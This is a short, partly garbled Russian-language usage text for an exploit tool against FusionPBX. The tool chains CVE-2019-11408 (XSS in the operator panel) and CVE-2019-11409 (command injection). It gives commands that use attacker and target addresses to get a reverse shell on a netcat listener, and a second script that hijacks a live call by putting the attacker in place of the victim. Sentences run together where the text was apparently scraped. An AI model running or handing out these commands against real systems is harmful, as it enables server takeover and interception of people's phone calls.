
Связка CVE-2019-11408 – XSS в панели оператора и CVE-2019-11409 – внедрение команд в панели оператора.
Этот простой код пытается завершить реализацию цепочки уязвимостей, представленной Дастином Коббом в статье RCE через Caller ID – множественные уязвимости в FusionPBX.
netcat слушатель на удалённой системе (rce_listener_address).x`python3 .\main.py --close_rce_sockets False --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --rce_listener_address {rce_listener_address}netcat-слушателю и предоставит обратную оболочку (reverse shell)Если мы знаем Call-ID, from-tag и to-tag вызова, запуск приведённого ниже кода подставит вас в вызов вместо жертвы.
python3 .\transfer.py --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --victim_number {victim_number} --dialog_identifier {dialog_identifier}